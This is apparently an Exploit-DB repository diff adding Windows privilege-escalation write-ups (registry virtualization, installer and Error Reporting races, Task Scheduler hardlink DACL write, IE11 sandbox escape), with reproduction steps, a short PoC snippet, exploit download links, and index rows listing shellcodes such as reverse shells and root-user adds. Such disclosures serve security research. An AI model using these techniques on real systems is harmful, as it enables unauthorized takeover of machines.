+These operations can’t be done from any sandbox that I know of so it’s only a user to system privilege escalation. 
+
+Proof of Concept:
+
+I’ve provided a PoC as a C# project. It will use the vulnerability to enumerate the top level of the SAM hive.
+
+1) Compile the C# project. It’ll need to pull NtApiDotNet from NuGet to build.
+2) As a normal user run the PoC. 
+3) The PoC should print the subkeys of the SAM hive.
+
+Expected Result:
+The query operation should fail.
+
+Observed Result:
+The SAM hive key is opened and enumerated.
+
+Some additional notes.
+
+I said this wasn’t exploitable from a sandbox but that turns out to be incorrect. It’s possible to mark a registry key as being a virtual store key using NtSetInformationKey with the KeySetVirtualizationInformation and passing a value of 1. When you do this the kernel always considers it to be a virtualized key for the purposes of enumeration, as long as the virtualization enabled flag is set when calling NtEnumerateKey it’ll call CmKeyBodyRemapToVirtualForEnum. 
+
+The path to the real registry key is generated by CmVirtualKCBToRealPath (not CmpReparseToVirtualPath as I said in the original report as that's the other direction) which just removes the first 4 path elements from the virtual key path and prepends \Registry. For example if you open the key \Registry\User\S-1-1-1\SOFTWARE\MACHINE\XYZ it’ll get mapped to \Registry\MACHINE\XYZ. 
+
+You can exploit this in an AC by creating a new application hive through RegLoadAppKey which will be mapped to \Registry\A\XYZ then creating a directory structure underneath that. For example if you load the app key, then create the subkeys ABC\MACHINE\SAM\SAM and mark the last one as a virtualized key then when opened with virtualization enabled you can now enumerate the SAM hive. I expect this can even be done from an Microsoft Edge Content Process as loading an application hive isn’t restricted, in fact it’s important for AC functionality.
+
+There’s a few places that call CmVirtualKCBToRealPath so I’d probably check their usage is correct as this behavior is odd. Of course I’d argue that CmVirtualKCBToRealPath should be more rigorous and also at a minimum you probably shouldn’t be able to set virtualization flags on application hives in general.
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/46912.zip

exploits/windows/local/46916.txt

@@ -0,0 +1,30 @@
+edit: Figure out how this works for yourself. I can't be bothered. It's a really hard race, doubt anyone will be able to repro anyway. Could be used with malware, you could programmatically trigger the rollback. Maybe you can even pass the silent flag to hide installer UI and find another way to trigger rollback (i.e through installer api, injecting into medium IL msiexec etc)
+
+## Installer - capturing rolback scripts - patch bypass #2
+
+There is still a race condition in the installer.
+
+So there is a really small timing window to win a race, where if we set a junction after the check but before it writes the DACL we can still get our original PoC to work.
+
+Again, it's a really small timing window, and while it appears to reliably reproduce on my setup.. I don't know if it will for yours. I've attached a procmon.exe log.
+
+How to reproduce:
+
+1. Run polarbear.exe (make sure to copy test.rbf and test.rbs in the same directory)
+
+2. Open a cmd and run an installer (has to be an autoelevating installer in c:\windows\insatller) this way "msiexec /fa c:\windows\installer\123123213.msi"
+When we pass the repair flag, it usually gives us a little more time to press the cancel button and trigger rollback. 
+polarbear.exe will print out when you have to press cancel. So you don't press it too early!
+
+3. If all is successful it will write oops.dll to system32. If failed.. make sure to delete the following folders: config.msi, new, new2, new3.
+Use the included video demo as guide... as the process is kind of complicated!
+
+Filter I used in procmon:
+
+You should see this on a successful run:
+
+The mount point on c:\config.msi has to be create after querynetworkfile and before setsecurityfile.
+
+
+
+EDB Note ~ Download: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/46916.zip

exploits/windows/local/46917.txt

@@ -0,0 +1,51 @@
+EDIT: Apparently this was patched earlier this month.. so whatever.
+
+Windows Error Reporting Arbitrary DACL write
+
+It can take upwards of 15 minutes for the bug to trigger. If it takes too long, closing the program, cleaning out the reportarchive folder in programdata (it may mess up the timing if there's too many reports in there as result of running our poc for too long), deleting the c:\blah folder.. etc.. might help. 
+
+I guess a more determined attacker might be able to make it more reliable. It is just an insanely small window in which we can win our race, I wasn't even sure if I could ever exploit it at all. 
+
+I don't see a way to use OPLOCKS to reliably win the race.. and while I can make it work fairly reliable in my VM, I need to use a "rand()" function to bruteforce a delay needed to hit the correct timing.. because this timing will vary wildly from hardware setup to setup.
+
+Overview:
+
+1. We turn c:\programdata\microsoft\windows\wer\reportqueue into a junction point to c:\blah 
+
+2. In c:\blah we create a folder named 1_1_1_1_1, and inside we dump a .wer file and another file called test
+
+3. We trigger the WER reporting queue task
+
+4. When the service tries to write a DACL we delete the file "test" after it calls GetSecurityFile on it and replace it with a hardlink, on which the service will call SetSecurityFile.
+
+Bug description:
+
+The WER service will try to delete both files while not impersonating when we trigger the reporting queue task. It does extensive testing against junctions.. so we cannot abuse that.
+
+However it will write a DACL to both files, to ensure that SYSTEM has the "delete" right over them. The way this works is in two steps:
+
+1. It calls GetFileSecurity and gets a security descriptor (or whatever the technical name is)
+
+2. It adds some stuff to the security descriptor so SYSTEM has delete rights, and then writes it back to the file using SetFileSecurity
+
+It also closes file handles between both function calls which is convenient.
+
+This means that if between both function calls we plant a hardlink.. it will first get the security descriptor from a normal file which authenticated users can write to. It will then copy these permissions, and applies this security descriptor to a hardlink pointing to an entirely different file.
+
+The race condition is incredibly hard to win. I havn't tested on another setup.. but you definitely need multiple processor cores and you may have to wait minutes for it to work (It can take a really long time.. ). Anyway... in an LPE scenario time is not that much of an issue. 
+
+A succesful run will look like this. You can see the hardlink being created after the QuerySecurityFile and before SetSecurityFile.
+
+You can also ofcourse look in IDA (wer.dll) and confirm there. The vulnerable function is: UtilAddAccessToPath
+
+Steps to reproduce:
+
+1. Copy AngryPolarBearBug.exe and report.wer into the same folder
+
+2. Run AngryPolarBearBug.exe
+
+After many long minutes it should stop and c:\windows\system32\drivers\pci.sys should now by writeable from non-admin.
+
+Again.. I have only tested this on both my VM and host, I don't even know if the random delay range will work on other hardware setups (it basically tries to bruteforce the correct timing).. so I hope you can repo it.
+
+EDB Note: Download ~ https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/46917.zip

exploits/windows/local/46918.txt

@@ -0,0 +1,72 @@
+Task Scheduler .job import arbitrary DACL write
+
+Tested on: Windows 10 32-bit
+
+Bug information:
+
+There are two folders for tasks.
+
+c:\windows\tasks
+
+c:\windows\system32\tasks
+
+The first one is only there for legacy purposes. The second one gets used by the task scheduler.
+
+In the old days (i.e windows xp) tasks would be placed in c:\windows\tasks in the ".job" fileformat. 
+
+If on windows 10 you want to import a .job file into the task scheduler you have to copy your old .job files into c:\windows\tasks and run the following command using "schtasks.exe and schedsvc.dll" copied from the old system: "schtasks /change /TN "taskname" /RU username /RP password" 
+
+(found this here: https://social.technet.microsoft.com/Forums/windowsserver/en-US/467e5cab-2368-42de-ae78-d86b644a0e71/transfer-scheduled-tasks-to-server-2008?forum=winserverMigration)
+
+This will result in a call to the following RPC "_SchRpcRegisterTask", which is exposed by the task scheduler service. (I assume that to trigger this bug you can just call into this function directly without using that schtasks.exe copied from windows xp.. but I am not great at reversing :(   )
+
+It starts out by impersonating the current user.
+
+But when it hits the following function: 
+
+int __stdcall tsched::SetJobFileSecurityByName(LPCWSTR StringSecurityDescriptor, const unsigned __int16 *, int, const unsigned __int16 *)
+
+It starts impersonating itself (NT AUTHORITY\SYSTEM)! 
+
+And then calls SetSecurityInfo on a task it created in c:\windows\system32\tasks.
+
+
+
+
+This can be easily abused.
+
+The PoC code:
+
+CopyFile(L"bear.job", L"c:\\windows\\tasks\\bear.job",FALSE);
+	system(command.c_str());
+	DeleteFile(L"c:\\windows\\system32\\tasks\\Bear");
+	CreateNativeHardlink(L"c:\\windows\\system32\\tasks\\bear", L"C:\\Windows\\system32\\drivers\\pci.sys");
+	system(command.c_str());
+
+First we copy bear .job into the legacy tasks folder.
+
+Then we call "schtasks /change /TN "bear" /RU username /RP password" 
+
+We have to call it "normally" first without planting a hardlink because otherwise it will fail, since the task already exists in c:\windows\system32\task.
+
+After that we delete the file it created. And plant a hardlink and re-run the same command.
+
+This time it will call SetSecurityInfo on our hardlink.
+
+How to run the PoC (you need to rebuild for x64, included binary is x86)
+
+1. copy polarbear.exe, bear.job, schtasks.exe, schtasks.dll from the folder "poc files" to your test VM
+
+2. run polarbear.exe passing a username and password of a local non admin account. I.e "polarbear.exe essbee polarbear"
+
+You can use the included video demo as reference.
+
+Solution?
+
+Make sure it impersonates the user! :D
+
+Limitations
+
+Obviously to run to PoC we have to pass a username and password. However, this can be the account information of a local non admin account, meaning it still crosses a security boundary. But for malware it would be harder to use this, since it's not that easy to obtain a cleartext password and even if we call _SchRpcRegisterTask directly, it still has a struct _TASK_USER_CRED argument, and I assume this expects clear text account info and not a token or something. Maybe you can use the Guest account or something when calling _schrpcregistertask directly.
+
+EDB Note ~ Download: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/46918.zip

exploits/windows/local/46919.txt

@@ -0,0 +1,7 @@
+Inject into IE11.
+
+Will work on other sandboxes that allow the opening of windows filepickers through a broker.
+
+You will gain medium IL javascript execution, at which point you simply retrigger your IE RCE bug.
+
+EDB Note ~ Download: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/46919.zip

exploits/windows/local/46920.txt

@@ -0,0 +1,9 @@
+# CVE-2019-0803
+Win32k Elevation of Privilege Poc
+
+Reference
+-----------------------------
+(steal Security token) https://github.com/mwrlabs/CVE-2016-7255
+
+
+EDB Note: Download ~ https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/46920.zip

files_exploits.csv

@@ -6447,16 +6447,20 @@ id,file,description,date,author,type,platform,port
 46876,exploits/windows/dos/46876.py,"BulletProof FTP Server 2019.0.0.50 - 'Storage-Path' Denial of Service (PoC)",2019-05-20,"Victor Mondragón",dos,windows,
 46883,exploits/multiple/dos/46883.py,"Deluge 1.3.15 - 'URL' Denial of Service (PoC)",2019-05-21,"Victor Mondragón",dos,multiple,
 46884,exploits/windows/dos/46884.py,"Deluge 1.3.15 - 'Webseeds' Denial of Service (PoC)",2019-05-21,"Victor Mondragón",dos,windows,
-46888,exploits/multiple/dos/46888.txt,"macOS < 10.14.5 / iOS < 12.3 DFG JIT Compiler - 'HasIndexedProperty' Use-After-Free",2019-05-21,"Google Security Research",dos,multiple,
-46889,exploits/multiple/dos/46889.txt,"macOS < 10.14.5 / iOS < 12.3 JavaScriptCore - Loop-Invariant Code Motion (LICM) in DFG JIT Leaves Stack Variable Uninitialized",2019-05-21,"Google Security Research",dos,multiple,
-46890,exploits/multiple/dos/46890.txt,"macOS < 10.14.5 / iOS < 12.3 JavaScriptCore - AIR Optimization Incorrectly Removes Assignment to Register",2019-05-21,"Google Security Research",dos,multiple,
-46891,exploits/multiple/dos/46891.cc,"macOS < 10.14.5 / iOS < 12.3 XNU - Wild-read due to bad cast in stf_ioctl",2019-05-21,"Google Security Research",dos,multiple,
-46892,exploits/multiple/dos/46892.txt,"macOS < 10.14.5 / iOS < 12.3 XNU - 'in6_pcbdetach' Stale Pointer Use-After-Free",2019-05-21,"Google Security Research",dos,multiple,
+46888,exploits/multiple/dos/46888.txt,"Apple macOS < 10.14.5 / iOS < 12.3 DFG JIT Compiler - 'HasIndexedProperty' Use-After-Free",2019-05-21,"Google Security Research",dos,multiple,
+46889,exploits/multiple/dos/46889.txt,"Apple macOS < 10.14.5 / iOS < 12.3 JavaScriptCore - Loop-Invariant Code Motion (LICM) in DFG JIT Leaves Stack Variable Uninitialized",2019-05-21,"Google Security Research",dos,multiple,
+46890,exploits/multiple/dos/46890.txt,"Apple macOS < 10.14.5 / iOS < 12.3 JavaScriptCore - AIR Optimization Incorrectly Removes Assignment to Register",2019-05-21,"Google Security Research",dos,multiple,
+46891,exploits/multiple/dos/46891.cc,"Apple macOS < 10.14.5 / iOS < 12.3 XNU - Wild-read due to bad cast in stf_ioctl",2019-05-21,"Google Security Research",dos,multiple,
+46892,exploits/multiple/dos/46892.txt,"Apple macOS < 10.14.5 / iOS < 12.3 XNU - 'in6_pcbdetach' Stale Pointer Use-After-Free",2019-05-21,"Google Security Research",dos,multiple,
 46893,exploits/windows/dos/46893.py,"BlueStacks 4.80.0.1060 - Denial of Service (PoC)",2019-05-22,"Alejandra Sánchez",dos,windows,
 46899,exploits/windows/dos/46899.txt,"RarmaRadio 2.72.3 - 'Server' Denial of Service (PoC)",2019-05-22,"Victor Mondragón",dos,windows,
 46900,exploits/windows/dos/46900.txt,"RarmaRadio 2.72.3 - 'Username' Denial of Service (PoC)",2019-05-22,"Victor Mondragón",dos,windows,
 46901,exploits/windows/dos/46901.py,"TapinRadio 2.11.6 - 'Address' Denial of Service (PoC)",2019-05-22,"Victor Mondragón",dos,windows,
 46902,exploits/windows/dos/46902.py,"TapinRadio 2.11.6 - 'Uername' Denial of Service (PoC)",2019-05-22,"Victor Mondragón",dos,windows,
+46908,exploits/windows/dos/46908.py,"NetAware 1.20 - 'Add Block' Denial of Service (PoC)",2019-05-23,"Alejandra Sánchez",dos,windows,
+46909,exploits/windows/dos/46909.py,"NetAware 1.20 - 'Share Name' Denial of Service (PoC)",2019-05-23,"Alejandra Sánchez",dos,windows,
+46911,exploits/windows/dos/46911.py,"Terminal Services Manager 3.2.1 - Denial of Service",2019-05-23,"Alejandra Sánchez",dos,windows,
+46913,exploits/ios/dos/46913.txt,"Visual Voicemail for iPhone - IMAP NAMESPACE Processing Use-After-Free",2019-05-23,"Google Security Research",dos,ios,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -10510,6 +10514,13 @@ id,file,description,date,author,type,platform,port
 46877,exploits/solaris/local/46877.c,"Solaris 10 1/13 (Intel) - 'dtprintinfo' Local Privilege Escalation",2019-05-20,"Marco Ivaldi",local,solaris,
 46878,exploits/solaris/local/46878.c,"Solaris 7/8/9 (SPARC) - 'dtprintinfo' Local Privilege Escalation (1)",2019-05-20,"Marco Ivaldi",local,solaris,
 46879,exploits/solaris/local/46879.c,"Solaris 7/8/9 (SPARC) - 'dtprintinfo' Local Privilege Escalation (2)",2019-05-20,"Marco Ivaldi",local,solaris,
+46916,exploits/windows/local/46916.txt,"Microsoft Windows 10 (17763.379) - Install DLL",2019-05-23,SandboxEscaper,local,windows,
+46917,exploits/windows/local/46917.txt,"Microsoft Windows (x84/x64) - 'Error Reporting' Discretionary Access Control List / Local Privilege Escalation",2019-05-22,SandboxEscaper,local,windows,
+46912,exploits/windows/local/46912.txt,"Microsoft Windows 10 1809 - 'CmKeyBodyRemapToVirtualForEnum' Arbitrary Key Enumeration Privilege Escalation",2019-05-23,"Google Security Research",local,windows,
+46914,exploits/macos/local/46914.rb,"Apple Mac OS X - Feedback Assistant Race Condition (Metasploit)",2019-05-23,Metasploit,local,macos,
+46918,exploits/windows/local/46918.txt,"Microsoft Windows (x84) - Task Scheduler' .job' Import Arbitrary Discretionary Access Control List Write / Local Privilege Escalation",2019-05-22,SandboxEscaper,local,windows,
+46919,exploits/windows/local/46919.txt,"Microsoft Internet Explorer 11 - Sandbox Escape",2019-05-22,SandboxEscaper,local,windows,
+46920,exploits/windows/local/46920.txt,"Microsoft Windows - 'Win32k' Local Privilege Escalation",2019-05-15,ExpLife0011,local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -17316,7 +17327,7 @@ id,file,description,date,author,type,platform,port
 45052,exploits/hardware/remote/45052.py,"HomeMatic Zentrale CCU2 - Remote Code Execution",2018-07-18,"Kacper Szurek",remote,hardware,
 45079,exploits/windows/remote/45079.txt,"Microsoft Windows - 'dnslint.exe' Drive-By Download",2018-07-23,hyp3rlinx,remote,windows,
 45099,exploits/php/remote/45099.rb,"WordPress Plugin Responsive Thumbnail Slider - Arbitrary File Upload (Metasploit)",2018-07-27,Metasploit,remote,php,80
-45100,exploits/linux/remote/45100.rb,"Axis Network Camera - .srv to parhand RCE (Metasploit)",2018-07-27,Metasploit,remote,linux,80
+45100,exploits/linux/remote/45100.rb,"Axis Network Camera - .srv to parhand Remote Code Execution (Metasploit)",2018-07-27,Metasploit,remote,linux,80
 45124,exploits/linux/remote/45124.rb,"SonicWall Global Management System - XMLRPC set_time_zone Command Injection (Metasploit)",2018-08-01,Metasploit,remote,linux,80
 45332,exploits/hardware/remote/45332.py,"FUJI XEROX DocuCentre-V 3065 Printer - Remote Command Execution",2018-09-05,vr_system,remote,hardware,9100
 45180,exploits/windows/remote/45180.txt,"Microsoft DirectX SDK - 'Xact.exe' Remote Code Execution",2018-08-13,hyp3rlinx,remote,windows,
@@ -17363,11 +17374,11 @@ id,file,description,date,author,type,platform,port
 45925,exploits/java/remote/45925.rb,"Apache Spark - (Unauthenticated) Command Execution (Metasploit)",2018-11-30,Metasploit,remote,java,6066
 45926,exploits/windows/remote/45926.py,"CyberArk 9.7 - Memory Disclosure",2018-12-03,"Thomas Zuk",remote,windows,1858
 45939,exploits/linux/remote/45939.py,"OpenSSH < 7.7 - User Enumeration (2)",2018-12-04,"Leap Security",remote,linux,22
-45952,exploits/windows/remote/45952.rb,"HP Intelligent Management - Java Deserialization RCE (Metasploit)",2018-12-04,Metasploit,remote,windows,8080
+45952,exploits/windows/remote/45952.rb,"HP Intelligent Management - Java Deserialization Remote Code Execution (Metasploit)",2018-12-04,Metasploit,remote,windows,8080
 45986,exploits/hardware/remote/45986.py,"Cisco RV110W - Password Disclosure / Command Execution",2018-12-14,RySh,remote,hardware,443
 45998,exploits/macos/remote/45998.rb,"Safari - Proxy Object Type Confusion (Metasploit)",2018-12-14,Metasploit,remote,macos,
 45999,exploits/windows/remote/45999.txt,"MiniShare 1.4.1 - 'HEAD/POST' Remote Buffer Overflow",2018-12-18,"Rafael Pedrero",remote,windows,80
-46024,exploits/multiple/remote/46024.rb,"Erlang - Port Mapper Daemon Cookie RCE (Metasploit)",2018-12-20,Metasploit,remote,multiple,25672
+46024,exploits/multiple/remote/46024.rb,"Erlang - Port Mapper Daemon Cookie Remote Code Execution (Metasploit)",2018-12-20,Metasploit,remote,multiple,25672
 46034,exploits/multiple/remote/46034.py,"Netatalk 3.1.12 - Authentication Bypass",2018-12-21,"Jacob Baines",remote,multiple,
 46052,exploits/multiple/remote/46052.py,"Kubernetes - (Unauthenticated) Arbitrary Requests",2018-12-10,evict,remote,multiple,
 46053,exploits/multiple/remote/46053.py,"Kubernetes - (Authenticated) Arbitrary Requests",2018-12-10,evict,remote,multiple,
@@ -17405,7 +17416,7 @@ id,file,description,date,author,type,platform,port
 46547,exploits/windows/remote/46547.py,"Mail Carrier 2.5.1 - 'MAIL FROM' Buffer Overflow",2019-03-15,"Joseph McDonagh",remote,windows,25
 46556,exploits/multiple/remote/46556.rb,"BMC Patrol Agent - Privilege Escalation Code Execution Execution (Metasploit)",2019-03-18,Metasploit,remote,multiple,3181
 46572,exploits/java/remote/46572.rb,"Jenkins 2.137 and Pipeline Groovy Plugin 2.61 - ACL Bypass and Metaprogramming Remote Code Execution (Metasploit)",2019-03-19,Metasploit,remote,java,
-46627,exploits/php/remote/46627.rb,"CMS Made Simple (CMSMS) Showtime2 - File Upload RCE (Metasploit)",2019-03-28,Metasploit,remote,php,80
+46627,exploits/php/remote/46627.rb,"CMS Made Simple (CMSMS) Showtime2 - File Upload Remote Code Execution (Metasploit)",2019-03-28,Metasploit,remote,php,80
 46628,exploits/multiple/remote/46628.rb,"Oracle Weblogic Server Deserialization RCE - Raw Object (Metasploit)",2019-03-28,Metasploit,remote,multiple,
 46641,exploits/php/remote/46641.rb,"TeemIp IPAM < 2.4.0 - 'new_config' Command Injection (Metasploit)",2019-04-03,AkkuS,remote,php,80
 46645,exploits/python/remote/46645.py,"PhreeBooks ERP 5.2.3 - Remote Command Execution",2019-04-03,"Metin Yunus Kandemir",remote,python,80
@@ -17432,8 +17443,8 @@ id,file,description,date,author,type,platform,port
 46762,exploits/windows/remote/46762.py,"Freefloat FTP Server 1.0 - 'SIZE' Remote Buffer Overflow",2019-04-30,"Kevin Randall",remote,windows,21
 46763,exploits/windows/remote/46763.py,"Freefloat FTP Server 1.0 - 'STOR' Remote Buffer Overflow",2019-04-30,"Kevin Randall",remote,windows,21
 46775,exploits/php/remote/46775.rb,"Moodle 3.6.3 - 'Install Plugin' Remote Command Execution (Metasploit)",2019-04-30,AkkuS,remote,php,
-46782,exploits/windows/remote/46782.rb,"AIS logistics ESEL-Server - Unauth SQL Injection RCE (Metasploit)",2019-04-30,Metasploit,remote,windows,
-46783,exploits/php/remote/46783.rb,"Pimcore < 5.71 - Unserialize RCE (Metasploit)",2019-04-30,Metasploit,remote,php,
+46782,exploits/windows/remote/46782.rb,"AIS logistics ESEL-Server - Unauthenticated SQL Injection Remote Code Execution (Metasploit)",2019-04-30,Metasploit,remote,windows,
+46783,exploits/php/remote/46783.rb,"Pimcore < 5.71 - Unserialize Remote Code Execution (Metasploit)",2019-04-30,Metasploit,remote,php,
 46785,exploits/linux/remote/46785.rb,"Ruby On Rails - DoubleTap Development Mode secret_key_base Remote Code Execution (Metasploit)",2019-05-02,Metasploit,remote,linux,3000
 46790,exploits/windows/remote/46790.txt,"Windows PowerShell ISE - Remote Code Execution",2019-05-03,hyp3rlinx,remote,windows,
 46792,exploits/linux/remote/46792.py,"Blue Angel Software Suite - Command Execution",2019-05-03,"Paolo Serracino_ Pietro Minniti_ Damiano Proietti",remote,linux,
@@ -17445,6 +17456,7 @@ id,file,description,date,author,type,platform,port
 46814,exploits/multiple/remote/46814.rb,"Oracle Weblogic Server - 'AsyncResponseService' Deserialization Remote Code Execution (Metasploit)",2019-05-08,Metasploit,remote,multiple,7001
 46839,exploits/php/remote/46839.rb,"PHP-Fusion 9.03.00 - 'Edit Profile' Remote Code Execution (Metasploit)",2019-05-14,AkkuS,remote,php,
 46880,exploits/php/remote/46880.rb,"GetSimpleCMS - Unauthenticated Remote Code Execution (Metasploit)",2019-05-20,Metasploit,remote,php,
+46915,exploits/php/remote/46915.rb,"Shopware - createInstanceFromNamedArguments PHP Object Instantiation Remote Code Execution (Metasploit)",2019-05-23,Metasploit,remote,php,
 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@@ -41327,3 +41339,4 @@ id,file,description,date,author,type,platform,port
 46897,exploits/hardware/webapps/46897.txt,"Carel pCOWeb < B1.2.1 - Cross-Site Scripting",2019-05-22,Luca.Chiou,webapps,hardware,
 46898,exploits/hardware/webapps/46898.txt,"Carel pCOWeb < B1.2.1 - Credentials Disclosure",2019-05-22,Luca.Chiou,webapps,hardware,
 46903,exploits/php/webapps/46903.txt,"Horde Webmail 5.2.22 - Multiple Vulnerabilities",2019-05-22,InfinitumIT,webapps,php,
+46910,exploits/php/webapps/46910.txt,"Nagios XI 5.6.1 - SQL injection",2019-05-23,JameelNabbo,webapps,php,

files_shellcodes.csv

@@ -4,7 +4,7 @@ id,file,description,date,author,type,platform
 13242,shellcodes/bsd/13242.txt,"BSD - Reverse (127.0.0.1:31337/TCP) Shell (/bin/sh) Shellcode (124 bytes)",2000-11-19,Scrippie,shellcode,bsd
 13243,shellcodes/bsd_ppc/13243.c,"BSD/PPC - execve(/bin/sh) Shellcode (128 bytes)",2004-09-26,Palante,shellcode,bsd_ppc
 13244,shellcodes/bsd_x86/13244.c,"BSD/x86 - setuid(0) + execve(/bin/sh) Shellcode (30 bytes)",2006-07-20,"Marco Ivaldi",shellcode,bsd_x86
-13245,shellcodes/bsd_x86/13245.c,"BSD/x86 - setuid(0) + Bind (31337/TCP) Shell Shellcode (94 bytes)",2006-07-20,"Marco Ivaldi",shellcode,bsd_x86
+13245,shellcodes/bsd_x86/13245.c,"BSD/x86 - setuid(0) + Bind (31337/TCP) Shell (/bin/sh) Shellcode (94 bytes)",2006-07-20,"Marco Ivaldi",shellcode,bsd_x86
 13246,shellcodes/bsd_x86/13246.c,"BSD/x86 - execve(/bin/sh) Shellcode (27 bytes)",2004-09-26,n0gada,shellcode,bsd_x86
 13247,shellcodes/bsd_x86/13247.c,"BSD/x86 - execve(/bin/sh) + setuid(0) Shellcode (29 bytes)",2004-09-26,"Matias Sedalo",shellcode,bsd_x86
 13248,shellcodes/bsd_x86/13248.c,"BSD/x86 - Bind (31337/TCP) Shell Shellcode (83 bytes)",2004-09-26,no1,shellcode,bsd_x86
@@ -661,7 +661,7 @@ id,file,description,date,author,type,platform
 43661,shellcodes/linux_x86/43661.c,"Linux/x86 - Audio (knock knock knock) via /dev/dsp + setreuid(0_0) + execve() Shellcode (566 bytes)",2000-12-20,"Cody Tubbs",shellcode,linux_x86
 43662,shellcodes/linux_x86/43662.c,"Linux/x86 - Add Root User (w000t) + No Password Shellcode (177 bytes)",2009-01-01,zillion,shellcode,linux_x86
 43663,shellcodes/linux_x86/43663.c,"Linux/x86 - execve(/sbin/ipchains -F) Shellcode (70 bytes)",2009-01-01,zillion,shellcode,linux_x86
-43664,shellcodes/linux_x86/43664.c,"Linux/x86 - execve(/sbin/iptables -F) Shellcode (70 bytes)",2009-01-01,zillion,shellcode,linux_x86
+43664,shellcodes/linux_x86/43664.c,"Linux/x86 - Flush IPTables Rules (execve(/sbin/iptables -F)) Shellcode (70 bytes)",2009-01-01,zillion,shellcode,linux_x86
 43666,shellcodes/linux_x86/43666.c,"Linux/x86 - execve(/bin/sh /tmp/p00p) Shellcode (70 bytes)",2009-01-01,zillion,shellcode,linux_x86
 43668,shellcodes/linux_x86/43668.c,"Linux/x86 - execve(/bin/ash) + exit() Shellcode (34 bytes)",2009-01-01,bob,shellcode,linux_x86
 43669,shellcodes/linux_x86/43669.c,"Linux/x86 - Add Root User To /etc/passwd + No Password + exit() Shellcode (83 bytes)",2009-01-01,bob,shellcode,linux_x86
@@ -671,7 +671,7 @@ id,file,description,date,author,type,platform
 43673,shellcodes/linux_x86/43673.c,"Linux/x86 - setresuid(0_0_0) + execve(/bin/sh) + exit() Shellcode (41 bytes)",2009-01-01,sacrine,shellcode,linux_x86
 43674,shellcodes/linux_x86/43674.c,"Linux/x86 - Reverse (www.netric.org:45295/TCP) Shell (/bin/sh) Shellcode (131 bytes)",2009-01-01,eSDee,shellcode,linux_x86
 43675,shellcodes/linux_x86/43675.c,"Linux/x86 - Bind (45295/TCP) Shell (/bin/sh) + fork() Shellcode (200 bytes)",2009-01-01,eSDee,shellcode,linux_x86
-43677,shellcodes/linux_x86/43677.c,"Linux/x86 - /sbin/iptables --flush Shellcode (69 bytes)",2009-01-01,eSDee,shellcode,linux_x86
+43677,shellcodes/linux_x86/43677.c,"Linux/x86 - Flush IPTables Rules (/sbin/iptables --flush) Shellcode (69 bytes)",2009-01-01,eSDee,shellcode,linux_x86
 43679,shellcodes/linux_x86/43679.c,"Linux/x86 - setuid(0) + execve(/bin/sh) Shellcode (29 bytes)",2009-01-01,"Marcin Ulikowski",shellcode,linux_x86
 43680,shellcodes/linux_x86/43680.c,"Linux/x86 - setuid(0) + execve(/bin/sh_ 0_ 0) Shellcode (27 bytes)",2009-01-01,"Marcin Ulikowski",shellcode,linux_x86
 43681,shellcodes/linux_x86/43681.c,"Linux/x86 - setuid(0) + chmod(/etc/shadow_ 0666) Shellcode (37 bytes)",2009-01-01,antrhacks,shellcode,linux_x86
@@ -703,7 +703,7 @@ id,file,description,date,author,type,platform
 43716,shellcodes/linux_x86/43716.c,"Linux/x86 - execve(/bin/sh) Shellcode (28 bytes)",2009-01-01,"Jean Pascal Pereira",shellcode,linux_x86
 43707,shellcodes/linux_x86/43707.c,"Linux/x86 - mkdir(hacked) + exit() Shellcode (36 bytes)",2009-01-01,zillion,shellcode,linux_x86
 43719,shellcodes/linux_x86/43719.c,"Linux/x86 - Stager Reads Second Stage From STDIN Shellcode (14 bytes)",2009-01-01,_fkz,shellcode,linux_x86
-43721,shellcodes/linux_x86/43721.c,"Linux/x86 - iptables --flush Shellcode (43 bytes)",2009-01-01,"Hamza Megahed",shellcode,linux_x86
+43721,shellcodes/linux_x86/43721.c,"Linux/x86 - Flush IPTables Rules (iptables --flush) Shellcode (43 bytes)",2009-01-01,"Hamza Megahed",shellcode,linux_x86
 43722,shellcodes/linux_x86/43722.c,"Linux/x86 - execve(/bin/sh) Shellcode (23 bytes) (2)",2009-01-01,"Hamza Megahed",shellcode,linux_x86
 43725,shellcodes/linux_x86/43725.c,"Linux/x86 - Force Reboot Shellcode (36 bytes)",2009-01-01,"Hamza Megahed",shellcode,linux_x86
 43724,shellcodes/linux_x86/43724.c,"Linux/x86 - execve(chmod 0777 /etc/shadow) Shellcode (57 bytes)",2009-01-01,"Hamza Megahed",shellcode,linux_x86
@@ -893,7 +893,7 @@ id,file,description,date,author,type,platform
 44807,shellcodes/linux_x86/44807.c,"Linux/x86 - Egghunter (0xdeadbeef) + access() + execve(/bin/sh) Shellcode (38 bytes)",2018-05-31,"Paolo Perego",shellcode,linux_x86
 44808,shellcodes/linux_x86/44808.c,"Linux/x86 - Bind (4444/TCP) Shell (/bin/sh) Shellcode (105 bytes)",2018-05-31,"Paolo Perego",shellcode,linux_x86
